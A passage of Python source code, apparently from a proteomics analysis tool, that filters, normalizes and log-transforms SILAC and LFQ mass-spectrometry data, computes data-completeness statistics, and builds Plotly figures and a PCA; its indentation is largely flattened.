            The multiindex dataframe is subjected to stringency filtering. Only proteins with complete profiles are considered (e.g. a set of 5 SILAC ratios
            in case you have 5 fractions; any protein with missing values is rejected). Proteins are retained with 3 or more quantifications in each
            subfraction (=count). Furthermore, proteins with only 2 quantification events in one or more subfractions are retained if their ratio variability for
            ratios obtained with 2 quantification events is below 30% (=var). SILAC ratios are linearly normalized by division by the fraction median.
            Subsequently, normalization to SILAC loading is performed. Data is annotated based on the specified marker set, e.g. eLife.
Args:
df_index: multiindex dataframe, which contains 3 level labels: MAP, Fraction, Type
RatioHLcount: int, 2
RatioVariability: int, 30
df_organellarMarkerSet: df, columns: "Gene names", "Compartment", no index
fractions: list of fractions e.g. ["01K", "03K", ...]
Returns:
df_stringency_mapfracstacked: dataframe, in which "MAP" and "Fraction" are stacked;
columns "Ratio H/L count", "Ratio H/L variability [%]", and "Ratio H/L" stored as single level indices
shape_dict["Shape after Ratio H/L count (>=3)/var (count>=2, var<30) filtering"] of df_countvarfiltered_stacked
shape_dict["Shape after filtering for complete profiles"] of df_stringency_mapfracstacked
"""
# Fraction and Map will be stacked
df_stack = df_index.stack(["Fraction", "Map"])
# filtering for sufficient number of quantifications (count in "Ratio H/L count"), taken variability (var in Ratio H/L variability [%]) into account
# zip: allows direct comparison of count and var
# only if the filtering parameters are fulfilled the data will be introduced into df_countvarfiltered_stacked
#default setting: RatioHLcount = 2 ; RatioVariability = 30
df_countvarfiltered_stacked = df_stack.loc[[count>RatioHLcount or (count==RatioHLcount and var<RatioVariability)
for var, count in zip(df_stack["Ratio H/L variability [%]"], df_stack["Ratio H/L count"])]]
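            # worked example of the filter above with RatioHLcount=2 and RatioVariability=30:
            # count=3, var=45 -> kept (count > 2); count=2, var=25 -> kept (count == 2 and var < 30);
            # count=2, var=35 -> dropped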
shape_dict["Shape after Ratio H/L count (>=3)/var (count==2, var<30) filtering"] = df_countvarfiltered_stacked.unstack(["Fraction", "Map"]).shape
# "Ratio H/L":normalization to SILAC loading, each individual experiment (FractionXMap) will be divided by its median
            # np.median([...]): only entries that are not NaN are considered
df_normsilac_stacked = df_countvarfiltered_stacked["Ratio H/L"]\
.unstack(["Fraction", "Map"])\
.apply(lambda x: x/np.nanmedian(x), axis=0)\
.stack(["Map", "Fraction"])
df_stringency_mapfracstacked = df_countvarfiltered_stacked[["Ratio H/L count", "Ratio H/L variability [%]"]].join(
pd.DataFrame(df_normsilac_stacked, columns=["Ratio H/L"]))
# dataframe is grouped (Map, id), that allows the filtering for complete profiles
df_stringency_mapfracstacked = df_stringency_mapfracstacked.groupby(["Map", "id"]).filter(lambda x: len(x)>=len(self.fractions))
shape_dict["Shape after filtering for complete profiles"]=df_stringency_mapfracstacked.unstack(["Fraction", "Map"]).shape
# Ratio H/L is converted into Ratio L/H
df_stringency_mapfracstacked["Ratio H/L"] = df_stringency_mapfracstacked["Ratio H/L"].transform(lambda x: 1/x)
#Annotation with marker genes
df_organellarMarkerSet = self.df_organellarMarkerSet
df_stringency_mapfracstacked.reset_index(inplace=True)
df_stringency_mapfracstacked = df_stringency_mapfracstacked.merge(df_organellarMarkerSet, how="left", on="Gene names")
df_stringency_mapfracstacked.set_index([c for c in df_stringency_mapfracstacked.columns
if c not in ["Ratio H/L count","Ratio H/L variability [%]","Ratio H/L"]], inplace=True)
df_stringency_mapfracstacked.rename(index={np.nan:"undefined"}, level="Compartment", inplace=True)
return df_stringency_mapfracstacked
def normalization_01_silac(df_stringency_mapfracstacked):
"""
The multiindex dataframe, that was subjected to stringency filtering, is 0-1 normalized ("Ratio H/L").
Args:
df_stringency_mapfracstacked: dataframe, in which "Map" and "Fraction" are stacked;
columns "Ratio H/L count", "Ratio H/L variability [%]", and "Ratio H/L" stored as single level indices
self:
fractions: list of fractions e.g. ["01K", "03K", ...]
data_completeness: series, for each individual map, as well as combined maps: 1 - (percentage of NANs)
Returns:
df_01_stacked: dataframe, in which "MAP" and "Fraction" are stacked; data in the column "Ratio H/L" is 0-1 normalized and renamed to "normalized
profile"; the columns "Ratio H/L count", "Ratio H/L variability [%]", and "normalized profile" stored as single level indices;
plotting is possible now
self:
analysis_summary_dict["Data/Profile Completeness"] : df, with information about Data/Profile Completeness
column: "Experiment", "Map", "Data completeness", "Profile completeness"
no row index
"""
df_01norm_unstacked = df_stringency_mapfracstacked["Ratio H/L"].unstack("Fraction")
# 0:1 normalization of Ratio L/H
df_01norm_unstacked = df_01norm_unstacked.div(df_01norm_unstacked.sum(axis=1), axis=0)
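            # worked example: a profile of ratios (2, 6, 2) across three fractions sums to 10 and
            # becomes (0.2, 0.6, 0.2), i.e. each fraction's share of the summed signal per protein and map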
df_01_stacked = df_stringency_mapfracstacked[["Ratio H/L count", "Ratio H/L variability [%]"]].join(pd.DataFrame
(df_01norm_unstacked.stack("Fraction"),columns=["Ratio H/L"]))
# "Ratio H/L" will be renamed to "normalized profile"
df_01_stacked.columns = [col if col!="Ratio H/L" else "normalized profile" for col in df_01_stacked.columns]
return df_01_stacked
def logarithmization_silac(df_stringency_mapfracstacked):
"""
The multiindex dataframe, that was subjected to stringency filtering, is logarithmized ("Ratio H/L").
Args:
df_stringency_mapfracstacked: dataframe, in which "MAP" and "Fraction" are stacked; the columns "Ratio H/L count", "Ratio H/L variability [%]",
and "Ratio H/L" stored as single level indices
Returns:
df_log_stacked: dataframe, in which "MAP" and "Fraction" are stacked; data in the column "log profile" originates from logarithmized "Ratio H/L"
data; the columns "Ratio H/L count", "Ratio H/L variability [%]" and "log profile" are stored as single level indices;
PCA is possible now
"""
# logarithmizing, basis of 2
df_lognorm_ratio_stacked = df_stringency_mapfracstacked["Ratio H/L"].transform(np.log2)
df_log_stacked = df_stringency_mapfracstacked[["Ratio H/L count", "Ratio H/L variability [%]"]].join(
pd.DataFrame(df_lognorm_ratio_stacked, columns=["Ratio H/L"]))
# "Ratio H/L" will be renamed to "log profile"
df_log_stacked.columns = [col if col !="Ratio H/L" else "log profile" for col in df_log_stacked.columns]
return df_log_stacked
def stringency_lfq(df_index):
"""
            The multiindex dataframe is subjected to stringency filtering. Only protein groups that were identified with
            at least [4] consecutive data points for "LFQ intensity" and whose summed MS/MS counts are >= n(fractions)*[2]
            (LFQ5: min. 10 and LFQ6: min. 12, respectively; coverage filtering) are included.
Data is annotated based on specified marker set e.g. eLife.
Args:
                df_index: multiindex dataframe, which contains 3 level labels: MAP, Fraction, Type
self:
df_organellarMarkerSet: df, columns: "Gene names", "Compartment", no index
fractions: list of fractions e.g. ["01K", "03K", ...]
summed_MSMS_counts: int, 2
consecutiveLFQi: int, 4
Returns:
df_stringency_mapfracstacked: dataframe, in which "Map" and "Fraction" is stacked; "LFQ intensity" and "MS/MS count" define a
single-level column index
self:
shape_dict["Shape after MS/MS value filtering"] of df_mscount_mapstacked
shape_dict["Shape after consecutive value filtering"] of df_stringency_mapfracstacked
"""
df_index = df_index.stack("Map")
# sorting the level 0, in order to have LFQ intensity - MS/MS count instead of continuous alternation
df_index.sort_index(axis=1, level=0, inplace=True)
# "MS/MS count"-column: take the sum over the fractions; if the sum is larger than n[fraction]*2, it will be stored in the new dataframe
minms = (len(self.fractions) * self.summed_MSMS_counts)
if minms > 0:
df_mscount_mapstacked = df_index.loc[df_index[("MS/MS count")].apply(np.sum, axis=1) >= minms]
shape_dict["Shape after MS/MS value filtering"]=df_mscount_mapstacked.unstack("Map").shape
df_stringency_mapfracstacked = df_mscount_mapstacked.copy()
else:
df_stringency_mapfracstacked = df_index.copy()
            # a series, not a dataframe, is generated; if there are at least e.g. 4 consecutive non-NaN values, the data will be retained
df_stringency_mapfracstacked.sort_index(level="Fraction", axis=1, key=natsort_index_keys, inplace=True)
df_stringency_mapfracstacked = df_stringency_mapfracstacked.loc[
df_stringency_mapfracstacked[("LFQ intensity")]\
.apply(lambda x: np.isfinite(x), axis=0)\
.apply(lambda x: sum(x) >= self.consecutiveLFQi and any(x.rolling(window=self.consecutiveLFQi).sum() >= self.consecutiveLFQi), axis=1)]
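            # illustration with consecutiveLFQi=4: a map profile quantified in fractions (1,1,1,1,-,1)
            # passes (>=4 values, four of them consecutive), whereas (1,-,1,-,1,1) is dropped because
            # no window of four consecutive fractions is fully quantified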
shape_dict["Shape after consecutive value filtering"]=df_stringency_mapfracstacked.unstack("Map").shape
df_stringency_mapfracstacked = df_stringency_mapfracstacked.copy().stack("Fraction")
#Annotation with marker genes
df_organellarMarkerSet = self.df_organellarMarkerSet
df_stringency_mapfracstacked.reset_index(inplace=True)
df_stringency_mapfracstacked = df_stringency_mapfracstacked.merge(df_organellarMarkerSet, how="left", on="Gene names")
df_stringency_mapfracstacked.set_index([c for c in df_stringency_mapfracstacked.columns
if c!="MS/MS count" and c!="LFQ intensity"], inplace=True)
df_stringency_mapfracstacked.rename(index={np.nan : "undefined"}, level="Compartment", inplace=True)
return df_stringency_mapfracstacked
def normalization_01_lfq(df_stringency_mapfracstacked):
"""
The multiindex dataframe, that was subjected to stringency filtering, is 0-1 normalized ("LFQ intensity").
Args:
df_stringency_mapfracstacked: dataframe, in which "Map" and "Fraction" is stacked, "LFQ intensity" and "MS/MS count" define a
single-level column index
self:
fractions: list of fractions e.g. ["01K", "03K", ...]
Returns:
df_01_stacked: dataframe, in which "MAP" and "Fraction" are stacked; data in the column "LFQ intensity" is 0-1 normalized and renamed to
"normalized profile"; the columns "normalized profile" and "MS/MS count" are stored as single level indices; plotting is possible now
"""
df_01norm_mapstacked = df_stringency_mapfracstacked["LFQ intensity"].unstack("Fraction")
            # 0:1 normalization of the LFQ intensities
df_01norm_unstacked = df_01norm_mapstacked.div(df_01norm_mapstacked.sum(axis=1), axis=0)
df_rest = df_stringency_mapfracstacked.drop("LFQ intensity", axis=1)
df_01_stacked = df_rest.join(pd.DataFrame(df_01norm_unstacked.stack(
"Fraction"),columns=["LFQ intensity"]))
# rename columns: "LFQ intensity" into "normalized profile"
df_01_stacked.columns = [col if col!="LFQ intensity" else "normalized profile" for col in
df_01_stacked.columns]
#imputation
df_01_stacked = df_01_stacked.unstack("Fraction").replace(np.NaN, 0).stack("Fraction")
df_01_stacked = df_01_stacked.sort_index()
return df_01_stacked
def logarithmization_lfq(df_stringency_mapfracstacked):
"""The multiindex dataframe, that was subjected to stringency filtering, is logarithmized ("LFQ intensity").
Args:
df_stringency_mapfracstacked: dataframe, in which "Map" and "Fraction" is stacked; "LFQ intensity" and "MS/MS count" define a
single-level column index
Returns:
df_log_stacked: dataframe, in which "MAP" and "Fraction" are stacked; data in the column "log profile" originates from logarithmized
"LFQ intensity"; the columns "log profile" and "MS/MS count" are stored as single level indices; PCA is possible now
"""
df_lognorm_ratio_stacked = df_stringency_mapfracstacked["LFQ intensity"].transform(np.log2)
df_rest = df_stringency_mapfracstacked.drop("LFQ intensity", axis=1)
df_log_stacked = df_rest.join(pd.DataFrame(df_lognorm_ratio_stacked, columns=["LFQ intensity"]))
# "LFQ intensity" will be renamed to "log profile"
df_log_stacked.columns = [col if col!="LFQ intensity" else "log profile" for col in df_log_stacked.columns]
return df_log_stacked
def split_ids_uniprot(el):
"""
            This finds the primary canonical protein ID in the protein group. If no canonical ID is present, it selects the first isoform ID.
"""
p1 = el.split(";")[0]
if "-" not in p1:
return p1
else:
p = p1.split("-")[0]
if p in el.split(";"):
return p
else:
return p1
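            # worked examples with hypothetical protein groups:
            #   "P12345-2;P12345;Q9Y6K9" -> "P12345"    (canonical ID is present in the group)
            #   "P04637-3;P99999"        -> "P04637-3"  (canonical form not listed, keep the first entry)
            #   "Q8N1F7"                 -> "Q8N1F7"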
if self.acquisition == "SILAC - MQ":
# Index data
df_index = indexingdf()
map_names = df_index.columns.get_level_values("Map").unique()
self.map_names = map_names
# Run stringency filtering and normalization
df_stringency_mapfracstacked = stringency_silac(df_index)
self.df_stringencyFiltered = df_stringency_mapfracstacked
self.df_01_stacked = normalization_01_silac(df_stringency_mapfracstacked)
self.df_log_stacked = logarithmization_silac(df_stringency_mapfracstacked)
# format and reduce 0-1 normalized data for comparison with other experiments
df_01_comparison = self.df_01_stacked.copy()
comp_ids = pd.Series([split_ids_uniprot(el) for el in df_01_comparison.index.get_level_values("Protein IDs")], name="Protein IDs")
df_01_comparison.index = df_01_comparison.index.droplevel("Protein IDs")
df_01_comparison.set_index(comp_ids, append=True, inplace=True)
df_01_comparison.drop(["Ratio H/L count", "Ratio H/L variability [%]"], inplace=True, axis=1)
df_01_comparison = df_01_comparison.unstack(["Map", "Fraction"])
df_01_comparison.columns = ["?".join(el) for el in df_01_comparison.columns.values]
df_01_comparison = df_01_comparison.copy().reset_index().drop(["C-Score", "Q-value", "Score", "Majority protein IDs", "Protein names", "id"], axis=1, errors="ignore")
            # populate the analysis summary dictionary with (meta)data
unique_proteins = [split_ids_uniprot(i) for i in set(self.df_01_stacked.index.get_level_values("Protein IDs"))]
unique_proteins.sort()
self.analysis_summary_dict["0/1 normalized data"] = df_01_comparison.to_json()
self.analysis_summary_dict["Unique Proteins"] = unique_proteins
self.analysis_summary_dict["changes in shape after filtering"] = shape_dict.copy()
analysis_parameters = {"acquisition" : self.acquisition,
"filename" : self.filename,
"comment" : self.comment,
"Ratio H/L count" : self.RatioHLcount,
"Ratio variability" : self.RatioVariability,
"organism" : self.organism,
}
self.analysis_summary_dict["Analysis parameters"] = analysis_parameters.copy()
# TODO this line needs to be removed.
self.analysed_datasets_dict[self.expname] = self.analysis_summary_dict.copy()
elif self.acquisition == "LFQ5 - MQ" or self.acquisition == "LFQ6 - MQ" or self.acquisition == "LFQ5 - Spectronaut" or self.acquisition == "LFQ6 - Spectronaut":
#if not summed_MS_counts:
# summed_MS_counts = self.summed_MS_counts
#if not consecutiveLFQi:
# consecutiveLFQi = self.consecutiveLFQi
if self.acquisition == "LFQ5 - MQ" or self.acquisition == "LFQ6 - MQ":
df_index = indexingdf()
elif self.acquisition == "LFQ5 - Spectronaut" or self.acquisition == "LFQ6 - Spectronaut":
df_index = spectronaut_LFQ_indexingdf()
map_names = df_index.columns.get_level_values("Map").unique()
self.map_names = map_names
df_stringency_mapfracstacked = stringency_lfq(df_index)
self.df_stringencyFiltered = df_stringency_mapfracstacked
self.df_log_stacked = logarithmization_lfq(df_stringency_mapfracstacked)
self.df_01_stacked = normalization_01_lfq(df_stringency_mapfracstacked)
df_01_comparison = self.df_01_stacked.copy()
comp_ids = pd.Series([split_ids_uniprot(el) for el in df_01_comparison.index.get_level_values("Protein IDs")], name="Protein IDs")
df_01_comparison.index = df_01_comparison.index.droplevel("Protein IDs")
df_01_comparison.set_index(comp_ids, append=True, inplace=True)
df_01_comparison.drop("MS/MS count", inplace=True, axis=1, errors="ignore")
df_01_comparison = df_01_comparison.unstack(["Map", "Fraction"])
df_01_comparison.columns = ["?".join(el) for el in df_01_comparison.columns.values]
df_01_comparison = df_01_comparison.copy().reset_index().drop(["C-Score", "Q-value", "Score", "Majority protein IDs", "Protein names", "id"], axis=1, errors="ignore")
self.analysis_summary_dict["0/1 normalized data"] = df_01_comparison.to_json()#double_precision=4) #.reset_index()
unique_proteins = [split_ids_uniprot(i) for i in set(self.df_01_stacked.index.get_level_values("Protein IDs"))]
unique_proteins.sort()
self.analysis_summary_dict["Unique Proteins"] = unique_proteins
self.analysis_summary_dict["changes in shape after filtering"] = shape_dict.copy()
analysis_parameters = {"acquisition" : self.acquisition,
"filename" : self.filename,
"comment" : self.comment,
"consecutive data points" : self.consecutiveLFQi,
"summed MS/MS counts" : self.summed_MSMS_counts,
"organism" : self.organism,
}
self.analysis_summary_dict["Analysis parameters"] = analysis_parameters.copy()
self.analysed_datasets_dict[self.expname] = self.analysis_summary_dict.copy()
#return self.df_01_stacked
elif self.acquisition == "Custom":
df_index = custom_indexing_and_normalization()
map_names = df_index.columns.get_level_values("Map").unique()
self.map_names = map_names
df_01_stacked = df_index.stack(["Map", "Fraction"])
df_01_stacked = df_01_stacked.reset_index().merge(self.df_organellarMarkerSet, how="left", on="Gene names")
df_01_stacked.set_index([c for c in df_01_stacked.columns if c not in ["normalized profile"]], inplace=True)
df_01_stacked.rename(index={np.nan:"undefined"}, level="Compartment", inplace=True)
self.df_01_stacked = df_01_stacked
df_01_comparison = self.df_01_stacked.copy()
comp_ids = pd.Series([split_ids_uniprot(el) for el in df_01_comparison.index.get_level_values("Protein IDs")], name="Protein IDs")
df_01_comparison.index = df_01_comparison.index.droplevel("Protein IDs")
df_01_comparison.set_index(comp_ids, append=True, inplace=True)
df_01_comparison.drop("MS/MS count", inplace=True, axis=1, errors="ignore")
df_01_comparison = df_01_comparison.unstack(["Map", "Fraction"])
df_01_comparison.columns = ["?".join(el) for el in df_01_comparison.columns.values]
df_01_comparison = df_01_comparison.copy().reset_index().drop(["C-Score", "Q-value", "Score", "Majority protein IDs", "Protein names", "id"], axis=1, errors="ignore")
self.analysis_summary_dict["0/1 normalized data"] = df_01_comparison.to_json()#double_precision=4) #.reset_index()
unique_proteins = [split_ids_uniprot(i) for i in set(self.df_01_stacked.index.get_level_values("Protein IDs"))]
unique_proteins.sort()
self.analysis_summary_dict["Unique Proteins"] = unique_proteins
self.analysis_summary_dict["changes in shape after filtering"] = shape_dict.copy()
analysis_parameters = {"acquisition" : self.acquisition,
"filename" : self.filename,
"comment" : self.comment,
"organism" : self.organism,
}
self.analysis_summary_dict["Analysis parameters"] = analysis_parameters.copy()
self.analysed_datasets_dict[self.expname] = self.analysis_summary_dict.copy()
else:
return "I do not know this"
def plot_log_data(self):
"""
Args:
self.df_log_stacked
Returns:
log_histogram: Histogram of log transformed data
"""
log_histogram = px.histogram(self.df_log_stacked.reset_index().sort_values(["Map", "Fraction"], key=natsort_list_keys),
x="log profile",
facet_col="Fraction",
facet_row="Map",
template="simple_white",
labels={"log profile": "log tranformed data ({})".format("LFQ intenisty" if self.acquisition != "SILAC - MQ" else "Ratio H/L")}
)
log_histogram.for_each_xaxis(lambda axis: axis.update(title={"text":""}))
log_histogram.for_each_yaxis(lambda axis: axis.update(title={"text":""}))
log_histogram.add_annotation(x=0.5, y=0, yshift=-50, xref="paper",showarrow=False, yref="paper",
text="log2(LFQ intensity)")
log_histogram.add_annotation(x=0, y=0.5, textangle=270, xref="paper",showarrow=False, yref="paper", xshift=-50,
text="count")
log_histogram.for_each_annotation(lambda a: a.update(text=a.text.split("=")[-1]))
return log_histogram
def quantity_profiles_proteinGroups(self):
"""
        Number of profiles, protein groups per experiment, and the data completeness of profiles (total quantity, intersection) are calculated.
Args:
self:
acquisition: string, "LFQ6 - Spectronaut", "LFQ5 - Spectronaut", "LFQ5 - MQ", "LFQ6 - MQ", "SILAC - MQ"
                df_index: multiindex dataframe, which contains 3 level labels: MAP, Fraction, Type
df_01_stacked: df; 0-1 normalized data with "normalized profile" as column name
Returns:
self:
                df_quantity_pr_pg: df; no index, columns: "filtering", "type", "npg", "npr", "npr_dc"; containing the following information:
npg_t: protein groups per experiment total quantity
                    npgf_t = groups with valid profiles per experiment total quantity
npr_t: profiles with any valid values
nprf_t = total number of valid profiles
npg_i: protein groups per experiment intersection
npgf_i = groups with valid profiles per experiment intersection
npr_i: profiles with any valid values in the intersection
nprf_i = total number of valid profiles in the intersection
npr_t_dc: profiles, % values != nan
nprf_t_dc = profiles, total, filtered, % values != nan
npr_i_dc: profiles, intersection, % values != nan
nprf_i_dc = profiles, intersection, filtered, % values != nan
df_npg | df_npgf: index: maps e.g. "Map1", "Map2",..., columns: fractions e.g. "03K", "06K", ...
npg_f = protein groups, per fraction
or npgf_f = protein groups, filtered, per fraction
df_npg_dc | df_npgf_dc: index: maps e.g. "Map1", "Map2",..., columns: fractions e.g. "03K", "06K", ...
npg_f_dc = protein groups, per fraction, % values != nan
or npgf_f_dc = protein groups, filtered, per fraction, % values != nan
"""
if self.acquisition == "SILAC - MQ":
df_index = self.df_index["Ratio H/L"]
df_01_stacked = self.df_01_stacked["normalized profile"]
elif self.acquisition.startswith("LFQ"):
df_index = self.df_index["LFQ intensity"]
df_01_stacked = self.df_01_stacked["normalized profile"].replace(0, np.nan)
elif self.acquisition == "Custom":
df_index = self.df_index["normalized profile"]
df_01_stacked = self.df_01_stacked["normalized profile"].replace(0, np.nan)
#unfiltered
npg_t = df_index.shape[0]
df_index_MapStacked = df_index.stack("Map")
npr_t = df_index_MapStacked.shape[0]/len(self.map_names)
npr_t_dc = 1-df_index_MapStacked.isna().sum().sum()/np.prod(df_index_MapStacked.shape)
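        # example of the completeness measure: a block of 100 profiles x 5 fractions with 40 missing
        # values gives a data completeness of 1 - 40/500 = 0.92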
#filtered
npgf_t = df_01_stacked.unstack(["Map", "Fraction"]).shape[0]
df_01_MapStacked = df_01_stacked.unstack("Fraction")
nprf_t = df_01_MapStacked.shape[0]/len(self.map_names)
nprf_t_dc = 1-df_01_MapStacked.isna().sum().sum()/np.prod(df_01_MapStacked.shape)
#unfiltered intersection
try:
df_index_intersection = df_index_MapStacked.groupby(level="Sequence").filter(lambda x : len(x)==len(self.map_names))
except:
df_index_intersection = df_index_MapStacked.groupby(level="Protein IDs").filter(lambda x : len(x)==len(self.map_names))
npr_i = df_index_intersection.shape[0]/len(self.map_names)
npr_i_dc = 1-df_index_intersection.isna().sum().sum()/np.prod(df_index_intersection.shape)
npg_i = df_index_intersection.unstack("Map").shape[0]
#filtered intersection
try:
df_01_intersection = df_01_MapStacked.groupby(level = "Sequence").filter(lambda x : len(x)==len(self.map_names))
except:
df_01_intersection = df_01_MapStacked.groupby(level = "Protein IDs").filter(lambda x : len(x)==len(self.map_names))
nprf_i = df_01_intersection.shape[0]/len(self.map_names)
nprf_i_dc = 1-df_01_intersection.isna().sum().sum()/np.prod(df_01_intersection.shape)
npgf_i = df_01_intersection.unstack("Map").shape[0]
# summarize in dataframe and save to attribute
df_quantity_pr_pg = pd.DataFrame(
{
"filtering": pd.Series(["before filtering", "before filtering", "after filtering", "after filtering"], dtype=np.dtype("O")),
"type": pd.Series(["total", "intersection", "total", "intersection"], dtype=np.dtype("O")),
"number of protein groups": pd.Series([npg_t, npg_i, npgf_t, npgf_i], dtype=np.dtype("float")),
"number of profiles": pd.Series([npr_t, npr_i, nprf_t, nprf_i], dtype=np.dtype("float")),
"data completeness of profiles": pd.Series([npr_t_dc, npr_i_dc, nprf_t_dc, nprf_i_dc], dtype=np.dtype("float"))})
self.df_quantity_pr_pg = df_quantity_pr_pg.reset_index()
self.analysis_summary_dict["quantity: profiles/protein groups"] = self.df_quantity_pr_pg.to_json()
#additional depth assessment per fraction
dict_npgf = {}
dict_npg = {}
list_npg_dc = []
list_npgf_dc = []
for df_intersection in [df_index_intersection, df_01_intersection]:
for fraction in self.fractions:
df_intersection_frac = df_intersection[fraction]
npgF_f_dc = 1-df_intersection_frac.isna().sum()/len(df_intersection_frac)
npgF_f = df_intersection_frac.unstack("Map").isnull().sum(axis=1).value_counts()
if fraction not in dict_npg.keys():
dict_npg[fraction] = npgF_f
list_npg_dc.append(npgF_f_dc)
else:
dict_npgf[fraction] = npgF_f
list_npgf_dc.append(npgF_f_dc)
df_npg = pd.DataFrame(dict_npg)
df_npg.index.name = "Protein Groups present in:"
df_npg.rename_axis("Fraction", axis=1, inplace=True)
df_npg = df_npg.stack("Fraction").reset_index()
df_npg = df_npg.rename({0: "Protein Groups"}, axis=1)
df_npg.sort_values(["Fraction", "Protein Groups present in:"], inplace=True, key=natsort_list_keys)
df_npgf = pd.DataFrame(dict_npgf)
df_npgf.index.name = "Protein Groups present in:"
df_npgf.rename_axis("Fraction", axis=1, inplace=True)
df_npgf = df_npgf.stack("Fraction").reset_index()
df_npgf = df_npgf.rename({0: "Protein Groups"}, axis=1)
df_npgf.sort_values(["Fraction", "Protein Groups present in:"], inplace=True, key=natsort_list_keys)
max_df_npg = df_npg["Protein Groups present in:"].max()
min_df_npg = df_npg["Protein Groups present in:"].min()
rename_numOFnans = {}
for x, y in zip(range(max_df_npg,min_df_npg-1, -1), range(max_df_npg+1)):
if y == 1:
rename_numOFnans[x] = "{} Map".format(y)
elif y == 0:
rename_numOFnans[x] = "PG not identified".format(y)
else:
rename_numOFnans[x] = "{} Maps".format(y)
for keys in rename_numOFnans.keys():
df_npg.loc[df_npg["Protein Groups present in:"] ==keys, "Protein Groups present in:"] = rename_numOFnans[keys]
df_npgf.loc[df_npgf["Protein Groups present in:"] ==keys, "Protein Groups present in:"] = rename_numOFnans[keys]
# summarize in dataframe and save to attributes
self.df_npg_dc = pd.DataFrame(
{
"Fraction" : pd.Series(self.fractions),
"Data completeness before filtering": pd.Series(list_npg_dc),
"Data completeness after filtering": pd.Series(list_npgf_dc),
})
self.df_npg = df_npg
self.df_npgf = df_npgf
def plot_quantity_profiles_proteinGroups(self):
"""
Args:
self:
df_quantity_pr_pg: df; no index, columns: "filtering", "type", "npg", "npr", "npr_dc"; further information: see above
Returns:
"""
df_quantity_pr_pg = self.df_quantity_pr_pg
layout = go.Layout(barmode="overlay",
xaxis_tickangle=90,
autosize=False,
width=300,
height=500,
xaxis=go.layout.XAxis(linecolor="black",
linewidth=1,
#title="Map",
mirror=True),
yaxis=go.layout.YAxis(linecolor="black",
linewidth=1,
mirror=True),
template="simple_white")
fig_npg = go.Figure()
for t in df_quantity_pr_pg["type"].unique():
plot_df = df_quantity_pr_pg[df_quantity_pr_pg["type"] == t]
fig_npg.add_trace(go.Bar(
x=plot_df["filtering"],
y=plot_df["number of protein groups"],
name=t))
fig_npg.update_layout(layout, title="Number of Protein Groups", yaxis=go.layout.YAxis(title="Protein Groups"))
fig_npr = go.Figure()
for t in df_quantity_pr_pg["type"].unique():
plot_df = df_quantity_pr_pg[df_quantity_pr_pg["type"] == t]
fig_npr.add_trace(go.Bar(
x=plot_df["filtering"],
y=plot_df["number of profiles"],
name=t))
fig_npr.update_layout(layout, title="Number of Profiles")
df_quantity_pr_pg = df_quantity_pr_pg.sort_values("filtering")
fig_npr_dc = go.Figure()
for t in df_quantity_pr_pg["filtering"].unique():
plot_df = df_quantity_pr_pg[df_quantity_pr_pg["filtering"] == t]
fig_npr_dc.add_trace(go.Bar(
x=plot_df["type"],
y=plot_df["data completeness of profiles"],
name=t))
fig_npr_dc.update_layout(layout, title="Coverage", yaxis=go.layout.YAxis(title="Data completness"))
#fig_npr_dc.update_xaxes(tickangle=30)
fig_npg_F = px.bar(self.df_npg,
x="Fraction",
y="Protein Groups",
color="Protein Groups present in:",
template="simple_white",
title = "Protein groups per fraction - before filtering",
width=500)
fig_npgf_F = px.bar(self.df_npgf,
x="Fraction",
y="Protein Groups",
color="Protein Groups present in:",
template="simple_white",
title = "Protein groups per fraction - after filtering",
width=500)
fig_npg_F_dc = go.Figure()
for data_type in ["Data completeness after filtering", "Data completeness before filtering"]:
fig_npg_F_dc.add_trace(go.Bar(
x=self.df_npg_dc["Fraction"],
y=self.df_npg_dc[data_type],
name=data_type))
fig_npg_F_dc.update_layout(layout, barmode="overlay", title="Data completeness per fraction", yaxis=go.layout.YAxis(title=""), height=450, width=600)
return fig_npg, fig_npr, fig_npr_dc, fig_npg_F, fig_npgf_F, fig_npg_F_dc
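# Usage sketch (hypothetical; `ds` stands for an already initialized and processed SpatialDataSet instance,
# which is an assumption for illustration only):
#   fig_npg, fig_npr, fig_npr_dc, fig_npg_F, fig_npgf_F, fig_npg_F_dc = ds.plot_quantity_profiles_proteinGroups()
#   fig_npg.show()  # number of protein groups before/after filtering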
def perform_pca(self):
"""
PCA will be performed, using logarithmized data (SILAC - MQ) or 0-1 normalized data (LFQ and Custom acquisitions).
Args:
self:
markerproteins: dictionary, key: cluster name, value: gene names (e.g. {"Proteasome" : ["PSMA1", "PSMA2",...], ...})
df_log_stacked: dataframe, in which "MAP" and "Fraction" are stacked; data in the column "log profile" originates from logarithmized "LFQ intensity"
and "Ratio H/L", respectively; additionally the columns "MS/MS count" and "Ratio H/L count|Ratio H/L variability [%]" are stored
as single level indices
df_01_stacked: dataframe, in which "MAP" and "Fraction" are stacked; data in the column "LFQ intensity" is 0-1 normalized and renamed to "normalized
profile"; the columns "normalized profile"" and "MS/MS count" are stored as single level indices; plotting is possible now
Returns:
self:
df_pca: df, PCA was performed, while keeping the information of the Maps
columns: "PC1", "PC2", "PC3"
index: "Protein IDs", "Majority protein IDs", "Protein names", "Gene names", "Q-value", "Score", "id", "Map" "Compartment"
df_pca_combined: df, PCA was performed across the Maps
columns: "PC1", "PC2", "PC3"
index: "Protein IDs", "Majority protein IDs", "Protein names", "Gene names", "Q-value", "Score", "id", "Compartment"
df_pca_all_marker_cluster_maps: PCA processed dataframe, containing the columns "PC1", "PC2", "PC3", filtered for marker genes, that are consistent
throughout all maps / coverage filtering.
"""
markerproteins = self.markerproteins
if self.acquisition == "SILAC - MQ":
df_01orlog_fracunstacked = self.df_log_stacked["log profile"].unstack("Fraction").dropna()
df_01orlog_MapFracUnstacked = self.df_log_stacked["log profile"].unstack(["Fraction", "Map"]).dropna()
elif self.acquisition.startswith("LFQ") or self.acquisition == "Custom":
df_01orlog_fracunstacked = self.df_01_stacked["normalized profile"].unstack("Fraction").dropna()
df_01orlog_MapFracUnstacked = self.df_01_stacked["normalized profile"].unstack(["Fraction", "Map"]).dropna()
pca = PCA(n_components=3)
# df_pca: PCA processed dataframe, containing the columns "PC1", "PC2", "PC3"
df_pca = pd.DataFrame(pca.fit_transform(df_01orlog_fracunstacked))
df_pca.columns = ["PC1", "PC2", "PC3"]
df_pca.index = df_01orlog_fracunstacked.index
self.df_pca = df_pca.sort_index(level=["Gene names", "Compartment"])
# df_pca: PCA processed dataframe, containing the columns "PC1", "PC2", "PC3"
df_pca_combined = pd.DataFrame(pca.fit_transform(df_01orlog_MapFracUnstacked))
df_pca_combined.columns = ["PC1", "PC2", "PC3"]
df_pca_combined.index = df_01orlog_MapFracUnstacked.index
